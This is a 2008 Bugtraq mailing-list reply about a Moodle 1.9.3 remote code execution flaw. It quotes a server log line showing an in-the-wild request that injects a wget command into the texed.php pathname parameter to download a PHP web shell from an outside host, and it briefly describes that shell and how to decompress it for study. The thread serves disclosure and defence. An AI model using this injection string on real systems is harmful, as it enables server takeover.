Re: Moodle 1.9.3 Remote Code Execution

To: lent@xxxxxxxxxx
Subject: Re: Moodle 1.9.3 Remote Code Execution
From: "Jamie Riden" <jamie.riden@xxxxxxxxx>
Date: Mon, 15 Dec 2008 17:22:32 +0000
Cc: bugtraq@xxxxxxxxxxxxxxxxx
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to :subject:cc:in-reply-to:mime-version:content-type :content-transfer-encoding:content-disposition:references; bh=YHp86Wl23FeeB0UY+lUGo6vSv5LZ4o+76xpZIBID+ZY=; b=Iu1ycM8UR54k6Q9BHESenwiB6qdteh4cyHq77I/jPoqHnChqCTVavIdn/q062qTeWG 58wzyBM5iWzNGQqMb4oAvF+dneywB2neN/ZyFt27AzhOCfvKE4cN3J8Nj9/tU7pIBH1V xvqd56QsCdEgrIrLO/v+2ybF2kLr4uf1kZ8Lg=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:cc:in-reply-to:mime-version :content-type:content-transfer-encoding:content-disposition :references; b=mtROa/Fttjf7oDtQQO5ggR4iYqv8DYPvATI1aXfiA5N4smNIv67pLqNGlYRbR9hB3Z smQaUXbRpK2QrHYCRmcN++vONM+2WdIBpy8GMwZjwCq3T8JDqeacuuyn0ijPQskhqEYx 2xsu00wJAAsq27SUgKto3cttYzRCuQAydgLic=
In-reply-to: <200812150500.mBF503U1010157@xxxxxxxxxxxxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
References: <200812150500.mBF503U1010157@xxxxxxxxxxxxxxxxxxxxxx>

2008/12/15  <lent@xxxxxxxxxx>:
> Exploit in the wild:
>
> We saw this come across:
>
> 216.205.95.178 - - [12/Dec/2008:15:03:13 -0500] "GET 
> /filter/tex/texed.php?formdata=foo&pathname=foo\";wget -O 
> perso.wanadoo.es/medline/z1.php;echo+\" HTTP/1.1" 404 218
>
>
> The host perso.wanadoo.es is still host the payload as of 
> [15/Dec/2008:00:14:00 -0500].

Looks like the usual sort of script to do things like execute
commands, upload/touch/delete files and eval() PHP. Only unusual in
that it's relatively clean and small.

I thought it was obfuscated at first glance, but it's just compressed
- only takes a couple of minutes to turn it into readable source.
(Just need to change ";eval($t) ?>" at the end to ";echo($t) ?>" and
run it from the CLI. Then add line breaks and formatting as required.)

cheers,
 Jamie
-- 
Jamie Riden / jamesr@xxxxxxxxxx / jamie@xxxxxxxxxxxxxxx
http://www.ukhoneynet.org/members/jamie/

References:
- Re: Moodle 1.9.3 Remote Code Execution
  - From: lent

Prev by Date: phpList vulnerability
Next by Date: Re: Re: Multiple XSRF in DD-WRT (Remote Root Command Execution)
Previous by thread: Re: Moodle 1.9.3 Remote Code Execution
Next by thread: Re: Re: Moodle 1.9.3 Remote Code Execution
Index(es):
- Date
- Thread